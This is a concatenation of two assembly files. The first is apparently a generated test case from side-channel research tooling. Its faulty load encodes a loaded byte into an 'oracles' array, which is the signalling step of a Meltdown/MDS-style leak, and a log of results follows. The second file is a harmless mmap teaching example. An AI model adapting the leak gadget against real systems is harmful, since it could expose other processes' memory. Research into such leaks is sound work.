TheStack | 887d704370d3464dd26816f9829a3609c4ba2393 | Assemblycode:Assembly | {"size": 4259, "ext": "asm", "max_stars_repo_path": "Transynther/x86/_processed/NONE/_zr_/i7-7700_9_0x48.log_21829_1610.asm", "max_stars_repo_name": "ljhsiun2/medusa", "max_stars_repo_stars_event_min_datetime": "2020-08-13T19:41:58.000Z", "max_stars_repo_stars_event_max_datetime": "2022-03-30T12:22:51.000Z", "max_issues_repo_path": "Transynther/x86/_processed/NONE/_zr_/i7-7700_9_0x48.log_21829_1610.asm", "max_issues_repo_name": "ljhsiun2/medusa", "max_issues_repo_issues_event_min_datetime": "2021-04-29T06:29:35.000Z", "max_issues_repo_issues_event_max_datetime": "2021-05-13T21:02:30.000Z", "max_forks_repo_path": "Transynther/x86/_processed/NONE/_zr_/i7-7700_9_0x48.log_21829_1610.asm", "max_forks_repo_name": "ljhsiun2/medusa", "max_forks_repo_forks_event_min_datetime": "2020-07-14T17:07:07.000Z", "max_forks_repo_forks_event_max_datetime": "2022-03-21T01:12:22.000Z"} | {"max_stars_count": 9, "max_issues_count": 1, "max_forks_count": 3, "avg_line_length": 53.2375, "max_line_length": 2999, "alphanum_fraction": 0.6607184785} | .global s_prepare_buffers
s_prepare_buffers:
push %r12
push %r8
push %rbp
push %rbx
lea addresses_D_ht+0xb642, %rbp
nop
nop
nop
dec %r12
movw $0x6162, (%rbp)
nop
nop
nop
nop
nop
cmp $26922, %rbx
pop %rbx
pop %rbp
pop %r8
pop %r12
ret
.global s_faulty_load
s_faulty_load:
push %r11
push %r12
push %r14
push %r15
push %rbp
push %rdi
push %rsi
// Store
lea addresses_A+0x4c2, %r15
nop
nop
and $29590, %r12
movw $0x5152, (%r15)
nop
nop
nop
dec %rbp
// Faulty Load
lea addresses_UC+0xe842, %r14
nop
nop
nop
nop
nop
sub %rsi, %rsi
mov (%r14), %r12w
lea oracles, %rdi
and $0xff, %r12
shlq $12, %r12
mov (%rdi,%r12,1), %r12
pop %rsi
pop %rdi
pop %rbp
pop %r15
pop %r14
pop %r12
pop %r11
ret
/*
<gen_faulty_load>
[REF]
{'OP': 'LOAD', 'src': {'type': 'addresses_UC', 'AVXalign': False, 'congruent': 0, 'size': 16, 'same': False, 'NT': False}}
{'OP': 'STOR', 'dst': {'type': 'addresses_A', 'AVXalign': False, 'congruent': 5, 'size': 2, 'same': False, 'NT': False}}
[Faulty Load]
{'OP': 'LOAD', 'src': {'type': 'addresses_UC', 'AVXalign': False, 'congruent': 0, 'size': 2, 'same': True, 'NT': False}}
<gen_prepare_buffer>
{'OP': 'STOR', 'dst': {'type': 'addresses_D_ht', 'AVXalign': False, 'congruent': 9, 'size': 2, 'same': False, 'NT': False}}
{'00': 21829}
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
*/
|
||||
TheStack | d4065dca37ce747806e5b886a48e85df60a30e68 | Assemblycode:Assembly | {"size": 819, "ext": "asm", "max_stars_repo_path": "ch4/mmap.asm", "max_stars_repo_name": "abhinav-upadhyay/low_level_programming", "max_stars_repo_stars_event_min_datetime": null, "max_stars_repo_stars_event_max_datetime": null, "max_issues_repo_path": "ch4/mmap.asm", "max_issues_repo_name": "abhinav-upadhyay/low_level_programming", "max_issues_repo_issues_event_min_datetime": null, "max_issues_repo_issues_event_max_datetime": null, "max_forks_repo_path": "ch4/mmap.asm", "max_forks_repo_name": "abhinav-upadhyay/low_level_programming", "max_forks_repo_forks_event_min_datetime": null, "max_forks_repo_forks_event_max_datetime": null} | {"max_stars_count": null, "max_issues_count": null, "max_forks_count": null, "avg_line_length": 13.8813559322, "max_line_length": 73, "alphanum_fraction": 0.6568986569} | %define O_RDONLY 0
%define PROT_READ 0x1
%define MAP_PRIVATE 0x2
global _start
section .data
fname: db 'test.txt', 0
section .text
print_string:
push rdi
call string_length
pop rsi
mov rdx, rax
mov rax, 1
mov rdi, 1
syscall
ret
string_length:
xor rax, rax
.loop:
cmp byte[rdi + rax], 0
je .end
inc rax
jmp .loop
.end:
ret
_start:
; open the file
mov rax, 2
mov rdi, fname
mov rsi, O_RDONLY
mov rdx, 0
syscall
; mmap the file
mov r8, rax
mov rax, 9
mov rdi, 0 ; we don't have any specific address to map the pages at
mov rsi, 4096 ; page size
mov rdx, PROT_READ
mov r10, MAP_PRIVATE
mov r9, 0
syscall
mov rdi, rax ; rax holds address of the mapped memory pages of the file
call print_string
mov rax, 60
xor rdi, rdi
syscall
|